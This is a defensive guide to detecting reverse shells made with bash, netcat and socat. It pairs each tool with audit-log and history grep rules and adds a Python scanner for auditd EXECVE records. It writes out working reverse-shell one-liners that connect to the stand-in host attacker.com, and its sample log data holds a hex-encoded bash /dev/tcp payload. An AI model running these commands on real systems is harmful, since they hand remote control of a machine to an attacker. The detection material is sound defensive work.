# Reverse Shell

## **Reverse Shell Detection and Analysis**

**Reverse shells** are a common tool in an attacker’s arsenal, enabling remote command execution on compromised systems. This guide explores methods used to establish reverse shells, detection strategies, and forensic analysis techniques.

***

## **Common Commands and Their Usage**

### **1. bash Command**

The **bash** command can establish reverse shells by leveraging `/dev/tcp` or `/dev/udp`.

**Example**:

```bash
export RHOST=attacker.com
export RPORT=12345
bash -c 'exec bash -i &>/dev/tcp/$RHOST/$RPORT <&1'
```

**Detection**:

* **Audit Logs** (requires an auditd rule on `execve`; note that auditd hex-encodes any argument containing spaces or quotes, so the `bash -c '...'` payload will not match a plain grep of the raw log and must be decoded first, for example with `ausearch -i`):

  ```bash
  grep "bash" /var/log/audit/audit.log | grep -E "udp|tcp"
  ```
* **Command History**:

  ```bash
  history | grep "bash" | grep -E "udp|tcp"
  grep "bash" ~/.bash_history | grep -E "udp|tcp"
  ```
* **EDR/XDR Logs**:\
  Monitor for **bash process creation** or **network events** involving `/dev/tcp` or `/dev/udp`.

### **2. nc (Netcat) Command**

**Netcat** is a versatile utility often used for reverse shells.

**Example**:

```bash
RHOST=attacker.com
RPORT=12345
nc -e /bin/sh $RHOST $RPORT
```

**Detection**:

* Focus on the **`-e`** parameter (runs a program on the connection) and the **`-l`** parameter (listen mode, used for bind shells).
* **Audit Logs**:

  ```bash
  # -w matches "nc" as a whole word, so "rsync -e" or "sync" do not produce false positives;
  # "--" stops grep from reading "-e" as an option.
  grep -w "nc" /var/log/audit/audit.log | grep -- "-e"
  ```
* **Command History**:

  ```bash
  history | grep -w "nc" | grep -- "-e"
  grep -w "nc" ~/.bash_history | grep -- "-e"
  ```
* **EDR/XDR Logs**:\
  Monitor **nc process creation** and check for unusual outbound connections.

### **3. socat Command**

**socat** offers more flexibility than **nc**, making it a preferred choice for advanced reverse shells.

**Example**:

```bash
RHOST=attacker.com
RPORT=12345
socat tcp-connect:$RHOST:$RPORT exec:/bin/sh,pty,stderr,setsid,sigint,sane
```

**Detection**:

* Investigate commands using **`exec`** and **`tcp-connect`**.
* **Audit Logs**:

  ```bash
  grep "socat" /var/log/audit/audit.log | grep -i "exec"
  ```
* **Command History**:

  ```bash
  history | grep "socat" | grep -i "exec"
  grep "socat" ~/.bash_history | grep -i "exec"
  ```
* **EDR/XDR Logs**:\
  Analyze **socat processes** for suspicious parameters and unexpected network activity.

***

## **General Detection Strategies**

### **1. Audit Logs**

Continuously monitor `/var/log/audit/audit.log` for specific commands and associated parameters:

* **Commands to Track**: `bash`, `nc`, `socat`
* **Example**:

  ```bash
  # Replace <command> with the program name; quote it so the shell and grep treat it literally.
  grep "<command>" /var/log/audit/audit.log
  ```
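Added example, not part of the original page: a small Python scanner that applies the three indicators above (bash with `/dev/tcp` or `/dev/udp`, `nc` with `-e` or `-l`, `socat` with `exec:` and `tcp-connect:`) to auditd EXECVE records, decoding the hex-encoded arguments that a plain grep of the raw log misses. The sample records, addresses and ports are constructed for the demonstration.

```python
import re
from os.path import basename

# Constructed auditd EXECVE records (not from a real host). auditd hex-encodes
# any argument containing spaces or quotes, so the bash -c payload that carries
# /dev/tcp is only visible in audit.log as a hex string; a plain grep misses it.
SAMPLE_AUDIT_LOG = [
    'type=EXECVE msg=audit(1700000000.101:201): argc=3 a0="bash" a1="-c" a2='
    + "exec bash -i &>/dev/tcp/10.0.0.5/4444 <&1".encode().hex().upper(),
    'type=EXECVE msg=audit(1700000000.102:202): argc=2 a0="bash" a1="-i"',
    'type=EXECVE msg=audit(1700000000.103:203): argc=5 a0="nc" a1="-e" a2="/bin/sh" a3="10.0.0.5" a4="4444"',
    'type=EXECVE msg=audit(1700000000.104:204): argc=3 a0="socat" a1="tcp-connect:10.0.0.5:4444" a2="exec:/bin/sh,pty,stderr,setsid,sigint,sane"',
    'type=EXECVE msg=audit(1700000000.105:205): argc=3 a0="rsync" a1="-e" a2="ssh"',
]

EXECVE_RE = re.compile(r'^type=EXECVE msg=audit\([\d.]+:(\d+)\): (.*)$')
ARG_RE = re.compile(r'\ba(\d+)=("(?:[^"\\]|\\.)*"|[0-9A-Fa-f]+)')

def parse_execve(line):
    """Return (audit serial, argv) for an EXECVE record, decoding hex args; else None."""
    m = EXECVE_RE.match(line.strip())
    if not m:
        return None
    args = {}
    for idx, raw in ARG_RE.findall(m.group(2)):
        args[int(idx)] = raw[1:-1] if raw.startswith('"') else \
            bytes.fromhex(raw).decode("utf-8", "replace")
    return m.group(1), [args[i] for i in sorted(args)]

def classify(argv):
    """Apply the page's three indicators to one decoded argv; return a reason or None."""
    prog = basename(argv[0])  # exact program name, so "nc" does not match "rsync"
    rest = [a.lower() for a in argv[1:]]
    if prog in ("bash", "sh") and any("/dev/tcp/" in a or "/dev/udp/" in a for a in rest):
        return "bash redirect to /dev/tcp or /dev/udp"
    if prog in ("nc", "ncat", "netcat") and any(a in ("-e", "-l") for a in rest):
        return "nc with -e or -l"
    if prog == "socat" and any(a.startswith("exec:") for a in rest) \
            and any(a.startswith(("tcp-connect:", "tcp:")) for a in rest):
        return "socat exec: with tcp-connect:"
    return None

def scan(lines):
    """Return [(audit serial, program, reason)] for each suspicious EXECVE record."""
    findings = []
    for serial, argv in filter(None, map(parse_execve, lines)):
        reason = classify(argv) if argv else None
        if reason:
            findings.append((serial, argv[0], reason))
    return findings
```

Running `scan` over a real `/var/log/audit/audit.log` only works if an auditd rule records `execve`, and the serial lets you pull the matching SYSCALL record (uid, ppid, cwd) for context.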

### **2. Command History**

Regularly inspect command history files for traces of suspicious commands. Note that `~/.bash_history` is only written when an interactive shell exits, so a still-running session or a command launched via `bash -c` leaves no trace there; treat history as corroborating evidence rather than a primary source:

* **Interactive Sessions**:

  ```bash
  history | grep "<command>"
  ```
* **Persistent Logs**:

  ```bash
  grep "<command>" ~/.bash_history
  ```

### **3. EDR/XDR Solutions**

Employ EDR or XDR tools to:

* **Track Process Creation**: Identify the origin of reverse shell tools.
* **Analyze Network Activity**: Monitor outbound connections, especially to uncommon ports or suspicious IP addresses.

### **4. Network Monitoring**

Set up alerts for:

* **Unusual Outbound Connections**: Look for high-frequency requests to external IPs.
* **Known Malicious Indicators**: Monitor outbound traffic to flagged domains or IPs.

***

## **Key Takeaways**

* **Reverse shells** exploit legitimate utilities like **bash**, **nc**, and **socat** for remote control.
* **Detection** relies on monitoring suspicious **process creation**, **command execution**, and **network connections**.
* **Forensic Analysis** requires correlating data from:
  * **Audit logs** (`/var/log/audit/audit.log`).
  * **Command histories** (`history` or `.bash_history`).
  * **EDR/XDR telemetry** for process and network activity.

By continuously monitoring system activity and analyzing logs for anomalies, defenders can effectively detect and respond to reverse shell threats.
